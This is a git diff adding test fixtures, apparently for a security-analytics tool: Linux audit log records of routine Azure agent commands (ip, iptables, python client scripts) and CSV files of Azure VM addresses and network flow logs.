+type=PROCTITLE msg=audit(1551487521.002:933): proctitle=6970002D34002D61002D6F0061646472657373
+type=SYSCALL msg=audit(1551487521.002:934): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662dd10 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19354 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487521.002:934): argc=3 a0="/bin/sh" a1="-c" a2=6970202D36202D61202D6F2061646472657373
+type=CWD msg=audit(1551487521.002:934): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487521.002:934): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487521.002:934): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487521.002:934): proctitle=2F62696E2F7368002D63006970202D36202D61202D6F2061646472657373
+type=SYSCALL msg=audit(1551487521.006:935): arch=c000003e syscall=59 success=yes exit=0 a0=562122490c70 a1=562122490c10 a2=562122490c40 a3=7f1402383810 items=2 ppid=19354 pid=19355 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="ip" exe="/bin/ip" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487521.006:935): argc=5 a0="ip" a1="-6" a2="-a" a3="-o" a4="address"
+type=CWD msg=audit(1551487521.006:935): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487521.006:935): item=0 name="/sbin/ip" inode=115 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487521.006:935): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487521.006:935): proctitle=6970002D36002D61002D6F0061646472657373
+type=SYSCALL msg=audit(1551487525.150:936): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d6f0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19356 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.150:936): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487525.150:936): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487525.150:936): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.150:936): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.150:936): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487525.150:937): arch=c000003e syscall=59 success=yes exit=0 a0=56081b078bb8 a1=56081b078b70 a2=56081b078b88 a3=7fdeaf325810 items=2 ppid=19356 pid=19357 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.150:937): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487525.150:937): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487525.150:937): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.150:937): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.150:937): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487525.154:938): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d6f0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19358 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.154:938): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487525.154:938): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487525.154:938): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.154:938): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.154:938): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487525.154:939): arch=c000003e syscall=59 success=yes exit=0 a0=55d63cc727e0 a1=55d63cc72728 a2=55d63cc727b0 a3=7fed0f4bb810 items=2 ppid=19358 pid=19359 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.154:939): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487525.154:939): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487525.154:939): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.154:939): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.154:939): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487525.506:940): arch=c000003e syscall=59 success=no exit=-2 a0=7ffe83757e40 a1=7ffe837580b0 a2=7ffe8375ce28 a3=20c9010 items=1 ppid=19301 pid=19361 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="omiagent" exe="/opt/omi/bin/omiagent" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.506:940): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487525.506:940): item=0 name="/usr/local/sbin/python" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.506:940): proctitle=2F6F70742F6F6D692F62696E2F6F6D696167656E740039003130002D2D64657374646972002F002D2D70726F7669646572646972002F6F70742F6F6D692F6C6962002D2D6C6F676C6576656C005741524E494E47
+type=SYSCALL msg=audit(1551487525.506:941): arch=c000003e syscall=59 success=no exit=-2 a0=7ffe83757e40 a1=7ffe837580b0 a2=7ffe8375ce28 a3=20c9010 items=1 ppid=19301 pid=19361 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="omiagent" exe="/opt/omi/bin/omiagent" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.506:941): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487525.506:941): item=0 name="/usr/local/bin/python" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.506:941): proctitle=2F6F70742F6F6D692F62696E2F6F6D696167656E740039003130002D2D64657374646972002F002D2D70726F7669646572646972002F6F70742F6F6D692F6C6962002D2D6C6F676C6576656C005741524E494E47
+type=SYSCALL msg=audit(1551487525.506:942): arch=c000003e syscall=59 success=no exit=-2 a0=7ffe83757e40 a1=7ffe837580b0 a2=7ffe8375ce28 a3=20c9010 items=1 ppid=19301 pid=19361 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="omiagent" exe="/opt/omi/bin/omiagent" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.506:942): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487525.506:942): item=0 name="/usr/sbin/python" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.506:942): proctitle=2F6F70742F6F6D692F62696E2F6F6D696167656E740039003130002D2D64657374646972002F002D2D70726F7669646572646972002F6F70742F6F6D692F6C6962002D2D6C6F676C6576656C005741524E494E47
+type=SYSCALL msg=audit(1551487525.506:943): arch=c000003e syscall=59 success=yes exit=0 a0=7ffe83757e40 a1=7ffe837580b0 a2=7ffe8375ce28 a3=20c9010 items=2 ppid=19301 pid=19361 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="python" exe="/usr/bin/python2.7" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.506:943): argc=3 a0="python" a1="/opt/microsoft/omsconfig/Scripts/client.py" a2="12"
+type=CWD msg=audit(1551487525.506:943): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487525.506:943): item=0 name="/usr/bin/python" inode=64177 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.506:943): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.506:943): proctitle=2F6F70742F6F6D692F62696E2F6F6D696167656E740039003130002D2D64657374646972002F002D2D70726F7669646572646972002F6F70742F6F6D692F6C6962002D2D6C6F676C6576656C005741524E494E47
+type=SYSCALL msg=audit(1551487525.542:944): arch=c000003e syscall=59 success=yes exit=0 a0=5558f3633170 a1=5558f3593a50 a2=7fff14ef85b8 a3=5558f2830680 items=2 ppid=19361 pid=19362 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.542:944): argc=3 a0="/bin/sh" a1="-c" a2=77686963682073657276696365
+type=CWD msg=audit(1551487525.542:944): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.542:944): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.542:944): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.542:944): proctitle=2F62696E2F7368002D630077686963682073657276696365
+type=SYSCALL msg=audit(1551487525.546:945): arch=c000003e syscall=59 success=yes exit=0 a0=55852a4d3bb0 a1=55852a4d3b50 a2=55852a4d3b68 a3=7f8f41bf9810 items=3 ppid=19362 pid=19363 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="which" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.546:945): argc=3 a0="/bin/sh" a1="/usr/bin/which" a2="service"
+type=CWD msg=audit(1551487525.546:945): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.546:945): item=0 name="/usr/bin/which" inode=31 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.546:945): item=1 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.546:945): item=2 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.546:945): proctitle=2F62696E2F7368002F7573722F62696E2F77686963680073657276696365
+type=SYSCALL msg=audit(1551487525.570:946): arch=c000003e syscall=59 success=no exit=-2 a0=5558f3694be0 a1=5558f36c5360 a2=7fff14ef85b8 a3=5558f2830680 items=1 ppid=19361 pid=19364 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="python" exe="/usr/bin/python2.7" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.570:946): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.570:946): item=0 name="/usr/local/sbin/file" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.570:946): proctitle=707974686F6E002F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F636C69656E742E7079003132
+type=SYSCALL msg=audit(1551487525.570:947): arch=c000003e syscall=59 success=no exit=-2 a0=5558f3694be0 a1=5558f36c5360 a2=7fff14ef85b8 a3=5558f2830680 items=1 ppid=19361 pid=19364 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="python" exe="/usr/bin/python2.7" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.570:947): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.570:947): item=0 name="/usr/local/bin/file" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.570:947): proctitle=707974686F6E002F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F636C69656E742E7079003132
+type=SYSCALL msg=audit(1551487525.570:948): arch=c000003e syscall=59 success=no exit=-2 a0=5558f3694be0 a1=5558f36c5360 a2=7fff14ef85b8 a3=5558f2830680 items=1 ppid=19361 pid=19364 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="python" exe="/usr/bin/python2.7" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.570:948): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.570:948): item=0 name="/usr/sbin/file" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.570:948): proctitle=707974686F6E002F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F636C69656E742E7079003132
+type=SYSCALL msg=audit(1551487525.570:949): arch=c000003e syscall=59 success=yes exit=0 a0=5558f3694be0 a1=5558f36c5360 a2=7fff14ef85b8 a3=5558f2830680 items=2 ppid=19361 pid=19364 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="file" exe="/usr/bin/file" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.570:949): argc=2 a0="file" a1="/usr/bin/python2.7"
+type=CWD msg=audit(1551487525.570:949): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.570:949): item=0 name="/usr/bin/file" inode=4300 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.570:949): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.570:949): proctitle=707974686F6E002F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F636C69656E742E7079003132
+type=SYSCALL msg=audit(1551487525.578:950): arch=c000003e syscall=59 success=no exit=-2 a0=7ffe83757e40 a1=7ffe837580b0 a2=7ffe8375ce28 a3=20c9010 items=1 ppid=19301 pid=19365 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="omiagent" exe="/opt/omi/bin/omiagent" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.578:950): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487525.578:950): item=0 name="/usr/local/sbin/python" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.578:950): proctitle=2F6F70742F6F6D692F62696E2F6F6D696167656E740039003130002D2D64657374646972002F002D2D70726F7669646572646972002F6F70742F6F6D692F6C6962002D2D6C6F676C6576656C005741524E494E47
+type=SYSCALL msg=audit(1551487525.578:951): arch=c000003e syscall=59 success=no exit=-2 a0=7ffe83757e40 a1=7ffe837580b0 a2=7ffe8375ce28 a3=20c9010 items=1 ppid=19301 pid=19365 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="omiagent" exe="/opt/omi/bin/omiagent" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.578:951): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487525.578:951): item=0 name="/usr/local/bin/python" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.578:951): proctitle=2F6F70742F6F6D692F62696E2F6F6D696167656E740039003130002D2D64657374646972002F002D2D70726F7669646572646972002F6F70742F6F6D692F6C6962002D2D6C6F676C6576656C005741524E494E47
+type=SYSCALL msg=audit(1551487525.578:952): arch=c000003e syscall=59 success=no exit=-2 a0=7ffe83757e40 a1=7ffe837580b0 a2=7ffe8375ce28 a3=20c9010 items=1 ppid=19301 pid=19365 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="omiagent" exe="/opt/omi/bin/omiagent" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.578:952): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487525.578:952): item=0 name="/usr/sbin/python" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.578:952): proctitle=2F6F70742F6F6D692F62696E2F6F6D696167656E740039003130002D2D64657374646972002F002D2D70726F7669646572646972002F6F70742F6F6D692F6C6962002D2D6C6F676C6576656C005741524E494E47
+type=SYSCALL msg=audit(1551487525.578:953): arch=c000003e syscall=59 success=yes exit=0 a0=7ffe83757e40 a1=7ffe837580b0 a2=7ffe8375ce28 a3=20c9010 items=2 ppid=19301 pid=19365 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="python" exe="/usr/bin/python2.7" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.578:953): argc=3 a0="python" a1="/opt/microsoft/omsconfig/Scripts/client.py" a2="12"
+type=CWD msg=audit(1551487525.578:953): cwd="/var/opt/omi/run"
+type=PATH msg=audit(1551487525.578:953): item=0 name="/usr/bin/python" inode=64177 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.578:953): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.578:953): proctitle=2F6F70742F6F6D692F62696E2F6F6D696167656E740039003130002D2D64657374646972002F002D2D70726F7669646572646972002F6F70742F6F6D692F6C6962002D2D6C6F676C6576656C005741524E494E47
+type=SYSCALL msg=audit(1551487525.610:954): arch=c000003e syscall=59 success=yes exit=0 a0=562035bf7d00 a1=562035beac60 a2=7ffcbb99ff58 a3=56203477f680 items=2 ppid=19365 pid=19366 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.610:954): argc=3 a0="/bin/sh" a1="-c" a2=77686963682073657276696365
+type=CWD msg=audit(1551487525.610:954): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.610:954): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.610:954): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.610:954): proctitle=2F62696E2F7368002D630077686963682073657276696365
+type=SYSCALL msg=audit(1551487525.614:955): arch=c000003e syscall=59 success=yes exit=0 a0=55fe8b549bb0 a1=55fe8b549b50 a2=55fe8b549b68 a3=7f8e091ec810 items=3 ppid=19366 pid=19367 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="which" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487525.614:955): argc=3 a0="/bin/sh" a1="/usr/bin/which" a2="service"
+type=CWD msg=audit(1551487525.614:955): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.614:955): item=0 name="/usr/bin/which" inode=31 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.614:955): item=1 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487525.614:955): item=2 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.614:955): proctitle=2F62696E2F7368002F7573722F62696E2F77686963680073657276696365
+type=SYSCALL msg=audit(1551487525.634:956): arch=c000003e syscall=59 success=no exit=-2 a0=562035ca54d0 a1=562035c791e0 a2=7ffcbb99ff58 a3=56203477f680 items=1 ppid=19365 pid=19368 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="python" exe="/usr/bin/python2.7" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.634:956): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.634:956): item=0 name="/usr/local/sbin/file" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.634:956): proctitle=707974686F6E002F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F636C69656E742E7079003132
+type=SYSCALL msg=audit(1551487525.634:957): arch=c000003e syscall=59 success=no exit=-2 a0=562035ca54d0 a1=562035c791e0 a2=7ffcbb99ff58 a3=56203477f680 items=1 ppid=19365 pid=19368 auid=4294967295 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=4294967295 comm="python" exe="/usr/bin/python2.7" subj==unconfined key=(null)
+type=CWD msg=audit(1551487525.634:957): cwd="/opt/microsoft/omsconfig/Scripts/2.6x-2.7x"
+type=PATH msg=audit(1551487525.634:957): item=0 name="/usr/local/bin/file" nametype=UNKNOWN cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487525.634:957): proctitle=707974686F6E002F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F636C69656E742E7079003132
diff --git a/tests/testdata/az_net.csv b/tests/testdata/az_net.csv
new file mode 100644
index 000000000..1b340182d
--- /dev/null
+++ b/tests/testdata/az_net.csv
@@ -0,0 +1,2 @@
+,PrivateIPAddresses,PublicIPAddresses
+0,10.0.6.5,51.140.160.102
diff --git a/tests/testdata/az_net_flows.csv b/tests/testdata/az_net_flows.csv
new file mode 100644
index 000000000..012c84cce
--- /dev/null
+++ b/tests/testdata/az_net_flows.csv
@@ -0,0 +1,461 @@
+,TenantId,TimeGenerated,FlowStartTime,FlowEndTime,FlowIntervalEndTime,FlowType,ResourceGroup,VMName,VMIPAddress,PublicIPs,SrcIP,DestIP,L4Protocol,L7Protocol,DestPort,FlowDirection,AllowedOutFlows,AllowedInFlows,DeniedInFlows,DeniedOutFlows,RemoteRegion,VMRegion,AllExtIPs,TotalAllowedFlows
+881,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.697,2019-02-12 13:00:07.000,2019-02-12 13:45:08.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+877,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-12 14:22:40.681,2019-02-12 13:00:48.000,2019-02-12 13:58:33.000,2019-02-12 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
